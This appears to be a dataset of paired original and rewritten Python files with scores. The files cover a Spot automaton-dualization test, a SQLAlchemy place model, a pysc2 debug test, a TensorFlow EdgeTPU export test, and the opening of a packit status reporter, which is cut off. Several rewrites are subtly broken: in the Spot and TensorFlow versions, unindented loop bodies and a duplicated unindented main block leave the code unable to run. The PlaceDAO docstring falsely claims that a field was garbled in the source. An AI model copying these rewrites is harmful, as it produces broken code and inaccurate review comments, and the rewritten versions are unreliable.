spot.srand(0)
rg = spot.randltlgenerator(2, opts)
for a in produce_automaton(produce_phi(rg, 1000)):
test_assert(a)
test_assert(spot.dualize(a), spot.dualize(spot.dualize(a)))
aut = spot.automaton("""
HOA: v1
States: 1
Start: 0
AP: 1 "a"
Acceptance: 3 Fin(2) & (Inf(1) | Fin(0))
--BODY--
State: 0
--END--""")
test_complement(aut)
for a in spot.automata('randaut -A \"random 0..6\" -H -D -n50 4|'):
test_complement(a) | lib/spot-2.8.1/tests/python/dualize.py |
import spot
import buddy
match_strings = [('is_buchi', 'is_co_buchi'),
('is_generalized_buchi', 'is_generalized_co_buchi'),
('is_all', 'is_none'),
('is_all', 'is_all'),
('is_buchi', 'is_all')]
# existential and universal are dual
# deterministic is self-dual
def dualtype(aut, dual):
    """Check that *dual* has a transition mode compatible with being the
    dual of *aut*: determinism must be preserved, and the
    existential/universal branching modes must be swapped."""
    if dual.acc().is_none():
        return True
    det_ok = spot.is_deterministic(dual) or not spot.is_deterministic(aut)
    univ_ok = spot.is_universal(dual) or not aut.is_existential()
    exist_ok = dual.is_existential() or not spot.is_universal(aut)
    return det_ok and univ_ok and exist_ok
def produce_phi(rg, n):
    """Draw *n* formulas from the random-formula generator *rg*.

    :param rg: generator object exposing a ``next()`` method
    :param n: number of formulas to produce (0 yields an empty list)
    :returns: list of the *n* generated formulas, in draw order
    """
    # Idiomatic replacement for the original while/append loop.
    return [rg.next() for _ in range(n)]
def produce_automaton(phi):
    """Translate each LTL formula in *phi* into an automaton.

    :param phi: iterable of formulas accepted by ``spot.translate``
    :returns: list of translated automata, one per formula, same order
    """
    # Idiomatic replacement for the original for/append loop.
    return [spot.translate(f) for f in phi]
def test_aut(aut, d=None):
    """Check that *d* (or ``spot.dualize(aut)`` when *d* is None) is a
    plausible dual of *aut*.

    :returns: ``(True, '')`` on success, otherwise ``(False, reason)``.
    """
    if d is None:
        d = spot.dualize(aut)
    aa = aut.acc()
    da = d.acc()
    # The original also computed is_complete/is_univ_dest/num_states into
    # locals that were never read; that dead code is removed here.
    if not dualtype(aut, d):
        return (False, 'Incorrect transition mode resulting of dual')
    # Accept as soon as one acceptance-type pairing (in either direction)
    # from the module-level match_strings table matches.
    for p in match_strings:
        if ((getattr(aa, p[0])() and getattr(da, p[1])())
                or (getattr(aa, p[1])() and getattr(da, p[0])())):
            return (True, '')
    return (False, 'Incorrect acceptance type dual')
# Tests that a (deterministic) automaton and its complement have complementary
# languages.
# FIXME This test could be extended to non-deterministic automata with a
# dealternization procedure.
def test_complement(aut):
    """Check that a deterministic automaton and its dual recognize
    complementary languages: their union (product_or) must be universal,
    i.e. the dual of the union must be empty."""
    assert aut.is_deterministic()
    d = spot.dualize(aut)
    # Union of the two languages; universal iff its dual is empty.
    s = spot.product_or(aut, d)
    assert spot.dualize(s).is_empty()
def test_assert(a, d=None):
    """Assert that test_aut(a, d) succeeds, printing diagnostics
    (the reason and both automata in HOA form) before failing."""
    ok, reason = test_aut(a, d)
    if ok:
        return
    print(reason)
    print(a.to_str('hoa'))
    print(spot.dualize(a).to_str('hoa'))
    assert False
aut = spot.translate('a')
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 1
AP: 1 "a"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic stutter-invariant very-weak
--BODY--
State: 0 {0}
[t] 0
State: 1
[0] 0
[!0] 2
State: 2
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[0] 2
State: 1 {0}
[0] 1
State: 2 {0}
[1] 2
--END--""")
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0
[!0] 3
[0] 1&2
State: 1 {0}
[0] 1
[!0] 3
State: 2 {0}
[1] 2
[!1] 3
State: 3
[t] 3
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0&2
AP: 2 "a" "b"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc univ-branch
--BODY--
State: 0
[0] 1
State: 1 {0}
[t] 1
State: 2
[1] 3
State: 3 {0}
[t] 3
--END--""")
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 1
AP: 2 "a" "b"
acc-name: all
Acceptance: 0 t
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[t] 0
State: 1
[!0 | !1] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0&2
AP: 2 "a" "b"
Acceptance: 2 Inf(0) | Inf(1)
properties: trans-labels explicit-labels state-acc univ-branch
--BODY--
State: 0
[0] 1
State: 1 {0}
[t] 1
State: 2
[1] 3
State: 3 {1}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 1
AP: 2 "a" "b"
acc-name: all
Acceptance: 0 t
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[t] 0
State: 1
[!0 | !1] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
State: 1 {0}
[0] 3
State: 2
[0] 3
State: 3 {0}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 5
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0 {0}
[0] 1
[!0] 4
State: 1 {0}
[0] 3
[!0] 4
State: 2 {0}
[0] 3
[!0] 4
State: 3 {0}
[t] 3
State: 4
[t] 4
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
Acceptance: 2 Inf(0) & Fin(1)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0 {0}
[0&!1] 1
[0&1] 2
State: 1 {1}
[1] 1
[0&!1] 2
State: 2
[!0&!1] 0
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
acc-name: Streett 1
Acceptance: 2 Fin(0) | Inf(1)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0 {0}
[0&!1] 1
[0&1] 2
[!0] 3
State: 1 {1}
[1] 1
[0&!1] 2
[!0&!1] 3
State: 2
[0 | 1] 2
[!0&!1] 0&2
State: 3
[t] 3
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc complete
--BODY--
State: 0
[0] 1
[!0] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
[0] 0
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 1
Start: 0
AP: 1 "a"
acc-name: none
Acceptance: 0 f
properties: trans-labels explicit-labels state-acc complete
properties: deterministic terminal
--BODY--
State: 0
[t] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc complete
--BODY--
State: 0
[0] 1
[!0] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 1
Start: 0
AP: 1 "a"
acc-name: none
Acceptance: 0 f
properties: trans-labels explicit-labels state-acc complete
properties: deterministic terminal
--BODY--
State: 0
[t] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels trans-acc
--BODY--
State: 0
[0&1] 1
[0&!1] 2
State: 1
[t] 1 {0}
[0] 0
State: 2
[0] 2
--END--""")
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0
[0&1] 1
[!0 | !1] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[0] 2
State: 1 {0}
[0] 1
State: 2
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 0
AP: 1 "a"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[!0] 1
State: 1 {0}
[t] 1
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0
AP: 1 "a"
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[!0] 2
[0] 0
State: 1 {0}
[t] 1
State: 2
[0] 3
[!0] 0
State: 3 {0}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 1 "a"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0
[0] 0
[!0] 1
State: 1
[!0] 0
[0] 2
State: 2 {0}
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 2 Fin(0) & Inf(1)
properties: trans-labels explicit-labels
--BODY--
State: 0
[!0] 0
[0] 1 {0}
[0] 2 {1}
State: 1
[t] 0
State: 2
[t] 0
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 1 "a"
acc-name: parity min even 2
Acceptance: 2 Inf(0) | Fin(1)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0
[!0] 0
[0] 1&2
State: 1 {0}
[t] 0
State: 2 {1}
[t] 0
--END--"""
aut = spot.translate('G!a R XFb')
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 5
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0 {0}
[0&1] 0
[0&!1] 1
[!0&!1] 1&2
[!0&1] 0&2
State: 1
[0&1] 0
[0&!1] 1
[!0&!1] 1&2
[!0&1] 0&2
State: 2
[!0&1] 3
[0 | !1] 4
State: 3 {0}
[!0] 3
[0] 4
State: 4
[t] 4
--END--"""
opts = spot.option_map()
opts.set('output', spot.randltlgenerator.LTL)
opts.set('tree_size_min', 15)
opts.set('tree_size_max', 15)
opts.set('seed', 0)
opts.set('simplification_level', 0)
spot.srand(0)
rg = spot.randltlgenerator(2, opts)
for a in produce_automaton(produce_phi(rg, 1000)):
test_assert(a)
test_assert(spot.dualize(a), spot.dualize(spot.dualize(a)))
aut = spot.automaton("""
HOA: v1
States: 1
Start: 0
AP: 1 "a"
Acceptance: 3 Fin(2) & (Inf(1) | Fin(0))
--BODY--
State: 0
--END--""")
test_complement(aut)
for a in spot.automata('randaut -A \"random 0..6\" -H -D -n50 4|'):
test_complement(a) | 0.453504 | 0.585457 |
from dataclasses import dataclass
from sqlalchemy import Column
from ..model import db
@dataclass
class PlaceDAO(db.Model):
__tablename__ = 'place'
__table_args__ = {'extend_existing': True}
id: int
place_num: int
place_name: str
content_id: int
sigungu_code: int
addr: str
lat: float
lng: float
event_start_date: str
event_end_date: str
first_image: str
second_image: str
detail_image: str
tel: str
tag: str
homepage: str
line_intro: str
readcount: int
industry: str
oper_date: str
oper_pd: str
modified_date: str
id = Column(db.Integer, primary_key=True)
place_num = Column(db.Integer, primary_key=False)
place_name = Column(db.String(50), primary_key=False)
content_id = Column(db.Integer, primary_key=False)
sigungu_code = Column(db.Integer, primary_key=False)
addr = Column(db.String(50), primary_key=False)
lat = Column(db.Float, primary_key=False)
lng = Column(db.Float, primary_key=False)
event_start_date = Column(db.String)
event_end_date = Column(db.String)
first_image = Column(db.String, primary_key=False)
second_image = Column(db.String, primary_key=False)
detail_image = Column(db.String, primary_key=False)
tel = Column(db.String, primary_key=False)
tag = Column(db.String, primary_key=False)
homepage = Column(db.String, primary_key=False)
line_intro = Column(db.String, primary_key=False)
readcount = Column(db.Integer, primary_key=False)
industry = Column(db.String, primary_key=False)
oper_date = Column(db.String, primary_key=False)
oper_pd = Column(db.String, primary_key=False)
modified_date = Column(db.String, primary_key=False)
def __init__(self, place_num, place_name, content_id, sigungu_code, addr, lat, lng,
event_start_date, event_end_date, first_image,
second_image, detail_image, tel, tag, homepage, line_intro,
readcount, industry, oper_date, oper_pd, modified_date):
self.place_num = place_num
self.place_name = place_name
self.content_id = content_id
self.sigungu_code = sigungu_code
self.addr = addr
self.lat = lat
self.lng = lng
self.event_start_date = event_start_date
self.event_end_date = event_end_date
self.first_image = first_image
self.second_image = second_image
self.detail_image = detail_image
self.tel = tel
self.tag = tag
self.homepage = homepage
self.line_intro = line_intro
self.readcount = readcount
self.industry = industry
self.oper_date = oper_date
self.oper_pd = oper_pd
self.modified_date = modified_date | camping_server1/app/main/model/place_dao.py | from dataclasses import dataclass
from sqlalchemy import Column
from ..model import db
@dataclass
class PlaceDAO(db.Model):
    """SQLAlchemy/dataclass model for one row of the ``place`` table.

    The dataclass annotations mirror the Column definitions so that
    instances serialize cleanly (e.g. via Flask's jsonify).
    NOTE(review): the trailing ``modified_date`` assignment was garbled in
    the source dump and has been restored here; the redundant
    ``primary_key=False`` keyword (the default) has been dropped.
    """
    __tablename__ = 'place'
    __table_args__ = {'extend_existing': True}

    # dataclass field annotations (serialization schema)
    id: int
    place_num: int
    place_name: str
    content_id: int
    sigungu_code: int
    addr: str
    lat: float
    lng: float
    event_start_date: str
    event_end_date: str
    first_image: str
    second_image: str
    detail_image: str
    tel: str
    tag: str
    homepage: str
    line_intro: str
    readcount: int
    industry: str
    oper_date: str
    oper_pd: str
    modified_date: str

    # column definitions
    id = Column(db.Integer, primary_key=True)
    place_num = Column(db.Integer)
    place_name = Column(db.String(50))
    content_id = Column(db.Integer)
    sigungu_code = Column(db.Integer)
    addr = Column(db.String(50))
    lat = Column(db.Float)
    lng = Column(db.Float)
    event_start_date = Column(db.String)
    event_end_date = Column(db.String)
    first_image = Column(db.String)
    second_image = Column(db.String)
    detail_image = Column(db.String)
    tel = Column(db.String)
    tag = Column(db.String)
    homepage = Column(db.String)
    line_intro = Column(db.String)
    readcount = Column(db.Integer)
    industry = Column(db.String)
    oper_date = Column(db.String)
    oper_pd = Column(db.String)
    modified_date = Column(db.String)

    def __init__(self, place_num, place_name, content_id, sigungu_code, addr, lat, lng,
                 event_start_date, event_end_date, first_image,
                 second_image, detail_image, tel, tag, homepage, line_intro,
                 readcount, industry, oper_date, oper_pd, modified_date):
        """Populate every column except the autogenerated ``id``."""
        self.place_num = place_num
        self.place_name = place_name
        self.content_id = content_id
        self.sigungu_code = sigungu_code
        self.addr = addr
        self.lat = lat
        self.lng = lng
        self.event_start_date = event_start_date
        self.event_end_date = event_end_date
        self.first_image = first_image
        self.second_image = second_image
        self.detail_image = detail_image
        self.tel = tel
        self.tag = tag
        self.homepage = homepage
        self.line_intro = line_intro
        self.readcount = readcount
        self.industry = industry
        self.oper_date = oper_date
        self.oper_pd = oper_pd
        self.modified_date = modified_date
"""Test that the debug commands work."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from ctools.pysc2 import maps
from ctools.pysc2 import run_configs
from ctools.pysc2.lib import units
from s2clientprotocol import common_pb2 as sc_common
from s2clientprotocol import debug_pb2 as sc_debug
from s2clientprotocol import sc2api_pb2 as sc_pb
class DebugTest(absltest.TestCase):
def test_multi_player(self):
run_config = run_configs.get()
map_inst = maps.get("Simple64")
with run_config.start(want_rgb=False) as controller:
create = sc_pb.RequestCreateGame(
local_map=sc_pb.LocalMap(
map_path=map_inst.path, map_data=map_inst.data(run_config)))
create.player_setup.add(type=sc_pb.Participant)
create.player_setup.add(
type=sc_pb.Computer,
race=sc_common.Terran,
difficulty=sc_pb.VeryEasy)
join = sc_pb.RequestJoinGame(race=sc_common.Terran,
options=sc_pb.InterfaceOptions(raw=True))
controller.create_game(create)
controller.join_game(join)
info = controller.game_info()
map_size = info.start_raw.map_size
controller.step(2)
obs = controller.observe()
def get_marines(obs):
return {u.tag: u for u in obs.observation.raw_data.units
if u.unit_type == units.Terran.Marine}
self.assertEmpty(get_marines(obs))
controller.debug(sc_debug.DebugCommand(
create_unit=sc_debug.DebugCreateUnit(
unit_type=units.Terran.Marine,
owner=1,
pos=sc_common.Point2D(x=map_size.x // 2, y=map_size.y // 2),
quantity=5)))
controller.step(2)
obs = controller.observe()
marines = get_marines(obs)
self.assertEqual(5, len(marines))
tags = sorted(marines.keys())
controller.debug([
sc_debug.DebugCommand(kill_unit=sc_debug.DebugKillUnit(
tag=[tags[0]])),
sc_debug.DebugCommand(unit_value=sc_debug.DebugSetUnitValue(
unit_value=sc_debug.DebugSetUnitValue.Life, value=5,
unit_tag=tags[1])),
])
controller.step(2)
obs = controller.observe()
marines = get_marines(obs)
self.assertEqual(4, len(marines))
self.assertNotIn(tags[0], marines)
self.assertEqual(marines[tags[1]].health, 5)
if __name__ == "__main__":
absltest.main() | ctools/pysc2/tests/debug_test.py | """Test that the debug commands work."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from ctools.pysc2 import maps
from ctools.pysc2 import run_configs
from ctools.pysc2.lib import units
from s2clientprotocol import common_pb2 as sc_common
from s2clientprotocol import debug_pb2 as sc_debug
from s2clientprotocol import sc2api_pb2 as sc_pb
class DebugTest(absltest.TestCase):
  """End-to-end check of the SC2 debug protocol commands.

  Starts a real game, spawns marines with DebugCreateUnit, then kills one
  and alters another's health with DebugKillUnit / DebugSetUnitValue.
  """

  def test_multi_player(self):
    run_config = run_configs.get()
    map_inst = maps.get("Simple64")
    with run_config.start(want_rgb=False) as controller:
      # One human participant, one very-easy Terran bot.
      create = sc_pb.RequestCreateGame(
          local_map=sc_pb.LocalMap(
              map_path=map_inst.path, map_data=map_inst.data(run_config)))
      create.player_setup.add(type=sc_pb.Participant)
      create.player_setup.add(
          type=sc_pb.Computer,
          race=sc_common.Terran,
          difficulty=sc_pb.VeryEasy)
      join = sc_pb.RequestJoinGame(race=sc_common.Terran,
                                   options=sc_pb.InterfaceOptions(raw=True))
      controller.create_game(create)
      controller.join_game(join)
      info = controller.game_info()
      map_size = info.start_raw.map_size
      controller.step(2)
      obs = controller.observe()
      def get_marines(obs):
        # Map unit tag -> raw unit proto for every marine in view.
        return {u.tag: u for u in obs.observation.raw_data.units
                if u.unit_type == units.Terran.Marine}
      self.assertEmpty(get_marines(obs))
      # Spawn 5 marines for player 1 at the center of the map.
      controller.debug(sc_debug.DebugCommand(
          create_unit=sc_debug.DebugCreateUnit(
              unit_type=units.Terran.Marine,
              owner=1,
              pos=sc_common.Point2D(x=map_size.x // 2, y=map_size.y // 2),
              quantity=5)))
      controller.step(2)
      obs = controller.observe()
      marines = get_marines(obs)
      self.assertEqual(5, len(marines))
      tags = sorted(marines.keys())
      # Kill the first marine; set the second one's life to 5.
      controller.debug([
          sc_debug.DebugCommand(kill_unit=sc_debug.DebugKillUnit(
              tag=[tags[0]])),
          sc_debug.DebugCommand(unit_value=sc_debug.DebugSetUnitValue(
              unit_value=sc_debug.DebugSetUnitValue.Life, value=5,
              unit_tag=tags[1])),
      ])
      controller.step(2)
      obs = controller.observe()
      marines = get_marines(obs)
      # Both debug commands must be reflected in the next observation.
      self.assertEqual(4, len(marines))
      self.assertNotIn(tags[0], marines)
      self.assertEqual(marines[tags[1]].health, 5)
if __name__ == "__main__":
absltest.main() | 0.78233 | 0.332635 |
import itertools
import os
from absl.testing import parameterized
import tensorflow as tf
from official.core import exp_factory
from official.core import task_factory
from official.projects.edgetpu.vision.serving import export_util
def _build_experiment_model(experiment_type):
"""Builds model from experiment type configuration w/o loading checkpoint.
To reduce test latency and avoid unexpected errors (e.g. checkpoint files not
exist in the dedicated path), we skip the checkpoint loading for the tests.
Args:
experiment_type: model type for the experiment.
Returns:
TF/Keras model for the task.
"""
params = exp_factory.get_exp_config(experiment_type)
if 'deeplabv3plus_mobilenet_edgetpuv2' in experiment_type:
params.task.model.backbone.mobilenet_edgetpu.pretrained_checkpoint_path = None
if 'autoseg_edgetpu' in experiment_type:
params.task.model.model_params.model_weights_path = None
params.validate()
params.lock()
task = task_factory.get_task(params.task)
return task.build_model()
def _build_model(config):
model = _build_experiment_model(config.model_name)
model_input = tf.keras.Input(
shape=(config.image_size, config.image_size, 3), batch_size=1)
model_output = export_util.finalize_serving(model(model_input), config)
model_for_inference = tf.keras.Model(model_input, model_output)
return model_for_inference
def _dump_tflite(model, config):
converter = tf.lite.TFLiteConverter.from_keras_model(model)
export_util.configure_tflite_converter(config, converter)
tflite_buffer = converter.convert()
tf.io.gfile.makedirs(os.path.dirname(config.output_dir))
tflite_path = os.path.join(config.output_dir, f'{config.model_name}.tflite')
tf.io.gfile.GFile(tflite_path, 'wb').write(tflite_buffer)
return tflite_path
SEG_MODELS = [
'autoseg_edgetpu_xs',
]
FINALIZE_METHODS = [
'resize512,argmax,squeeze', 'resize256,argmax,resize512,squeeze',
'resize128,argmax,resize512,squeeze'
]
class ExportTfliteTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.parameters(
('mobilenet_edgetpu_v2_xs', 224),
('autoseg_edgetpu_xs', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k_32', 512),
)
def test_model_build_and_export_tflite(self, model_name, image_size):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name, image_size=image_size, output_dir=tmp_dir)
config.quantization_config.quantize = False
model = _build_model(config)
tflite_path = _dump_tflite(model, config)
self.assertTrue(tf.io.gfile.exists(tflite_path))
@parameterized.parameters(
('mobilenet_edgetpu_v2_xs', 224),
('autoseg_edgetpu_xs', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k_32', 512),
)
def test_model_build_and_export_saved_model(self, model_name, image_size):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name, image_size=image_size, output_dir=tmp_dir)
model = _build_model(config)
saved_model_path = os.path.join(config.output_dir, config.model_name)
model.save(saved_model_path)
self.assertTrue(tf.saved_model.contains_saved_model(saved_model_path))
@parameterized.parameters(itertools.product(SEG_MODELS, FINALIZE_METHODS))
def test_segmentation_finalize_methods(self, model_name, finalize_method):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name,
image_size=512,
output_dir=tmp_dir,
finalize_method=finalize_method.split(','))
config.quantization_config.quantize = False
model = _build_model(config)
model_input = tf.random.normal([1, config.image_size, config.image_size, 3])
self.assertEqual(
model(model_input).get_shape().as_list(),
[1, config.image_size, config.image_size])
if __name__ == '__main__':
tf.test.main() | official/projects/edgetpu/vision/serving/export_tflite_test.py | import itertools
import os
from absl.testing import parameterized
import tensorflow as tf
from official.core import exp_factory
from official.core import task_factory
from official.projects.edgetpu.vision.serving import export_util
def _build_experiment_model(experiment_type):
  """Builds the task model for *experiment_type* without loading checkpoints.

  Checkpoint loading is disabled so tests stay fast and do not depend on
  checkpoint files being present at their dedicated paths.

  Args:
    experiment_type: registered experiment name.

  Returns:
    The TF/Keras model built by the task.
  """
  params = exp_factory.get_exp_config(experiment_type)
  model_cfg = params.task.model
  if 'deeplabv3plus_mobilenet_edgetpuv2' in experiment_type:
    model_cfg.backbone.mobilenet_edgetpu.pretrained_checkpoint_path = None
  if 'autoseg_edgetpu' in experiment_type:
    model_cfg.model_params.model_weights_path = None
  params.validate()
  params.lock()
  return task_factory.get_task(params.task).build_model()
def _build_model(config):
  """Wraps the experiment model with serving finalization for export.

  Builds a batch-1 Keras model whose output has the serving post-processing
  from export_util applied.
  """
  core_model = _build_experiment_model(config.model_name)
  inputs = tf.keras.Input(
      shape=(config.image_size, config.image_size, 3), batch_size=1)
  outputs = export_util.finalize_serving(core_model(inputs), config)
  return tf.keras.Model(inputs, outputs)
def _dump_tflite(model, config):
  """Converts *model* to TFLite and writes it under config.output_dir.

  Returns:
    Path of the written `<model_name>.tflite` file.
  """
  converter = tf.lite.TFLiteConverter.from_keras_model(model)
  export_util.configure_tflite_converter(config, converter)
  tflite_buffer = converter.convert()
  # Create the directory the file is written into. The original created
  # os.path.dirname(config.output_dir) — the *parent* — so the write below
  # could fail when output_dir itself did not exist.
  tf.io.gfile.makedirs(config.output_dir)
  tflite_path = os.path.join(config.output_dir, f'{config.model_name}.tflite')
  # Use a context manager so the file handle is closed deterministically.
  with tf.io.gfile.GFile(tflite_path, 'wb') as f:
    f.write(tflite_buffer)
  return tflite_path
# Segmentation models exercised by the finalize-method test below.
SEG_MODELS = [
    'autoseg_edgetpu_xs',
]
# Candidate serving post-processing pipelines: comma-separated step names
# consumed by export_util (split on ',' before being passed as
# finalize_method).
FINALIZE_METHODS = [
    'resize512,argmax,squeeze', 'resize256,argmax,resize512,squeeze',
    'resize128,argmax,resize512,squeeze'
]
class ExportTfliteTest(tf.test.TestCase, parameterized.TestCase):
  """Export-path tests: TFLite conversion, SavedModel, and finalize methods."""

  @parameterized.parameters(
      ('mobilenet_edgetpu_v2_xs', 224),
      ('autoseg_edgetpu_xs', 512),
      ('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k', 512),
      ('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k_32', 512),
  )
  def test_model_build_and_export_tflite(self, model_name, image_size):
    """Model converts to a .tflite file (quantization disabled for speed)."""
    tmp_dir = self.create_tempdir().full_path
    config = export_util.ExportConfig(
        model_name=model_name, image_size=image_size, output_dir=tmp_dir)
    config.quantization_config.quantize = False
    model = _build_model(config)
    tflite_path = _dump_tflite(model, config)
    self.assertTrue(tf.io.gfile.exists(tflite_path))

  @parameterized.parameters(
      ('mobilenet_edgetpu_v2_xs', 224),
      ('autoseg_edgetpu_xs', 512),
      ('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k', 512),
      ('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k_32', 512),
  )
  def test_model_build_and_export_saved_model(self, model_name, image_size):
    """Model saves as a valid SavedModel directory."""
    tmp_dir = self.create_tempdir().full_path
    config = export_util.ExportConfig(
        model_name=model_name, image_size=image_size, output_dir=tmp_dir)
    model = _build_model(config)
    saved_model_path = os.path.join(config.output_dir, config.model_name)
    model.save(saved_model_path)
    self.assertTrue(tf.saved_model.contains_saved_model(saved_model_path))

  @parameterized.parameters(itertools.product(SEG_MODELS, FINALIZE_METHODS))
  def test_segmentation_finalize_methods(self, model_name, finalize_method):
    """Each finalize pipeline yields a (1, H, W) segmentation output."""
    tmp_dir = self.create_tempdir().full_path
    config = export_util.ExportConfig(
        model_name=model_name,
        image_size=512,
        output_dir=tmp_dir,
        finalize_method=finalize_method.split(','))
    config.quantization_config.quantize = False
    model = _build_model(config)
    model_input = tf.random.normal([1, config.image_size, config.image_size, 3])
    self.assertEqual(
        model(model_input).get_shape().as_list(),
        [1, config.image_size, config.image_size])

if __name__ == '__main__':
  tf.test.main()
if __name__ == '__main__':
tf.test.main() | 0.693992 | 0.282753 |
import hashlib
import logging
from typing import Optional, Union
import github
import gitlab
from ogr.abstract import CommitStatus, GitProject
from ogr.services.gitlab import GitlabProject
from ogr.services.pagure import PagureProject
logger = logging.getLogger(__name__)
class StatusReporter:
    """Report job results as commit statuses on GitHub/GitLab/Pagure.

    Falls back to commit comments when the forge refuses the status API call
    (missing permissions, unknown commit, ...).
    """

    def __init__(
        self,
        project: GitProject,
        commit_sha: str,
        pr_id: Optional[int] = None,
    ):
        """
        :param project: project the statuses belong to
        :param commit_sha: commit the statuses are attached to
        :param pr_id: pull/merge request number, when known
        """
        logger.debug(
            f"Status reporter will report for {project}, commit={commit_sha}, pr={pr_id}"
        )
        self.project: GitProject = project
        self._project_with_commit: Optional[GitProject] = None
        self.commit_sha: str = commit_sha
        self.pr_id: Optional[int] = pr_id

    @property
    def project_with_commit(self) -> GitProject:
        """
        Returns GitProject from which we can set commit status.
        """
        if self._project_with_commit is None:
            # For GitLab MRs the commit lives in the source project (the
            # fork), so the status has to be set there.
            self._project_with_commit = (
                self.project.get_pr(self.pr_id).source_project
                if isinstance(self.project, GitlabProject) and self.pr_id is not None
                else self.project
            )
        return self._project_with_commit

    def report(
        self,
        state: CommitStatus,
        description: str,
        url: str = "",
        check_names: Union[str, list, None] = None,
    ) -> None:
        """
        Set commit check status for each check name.

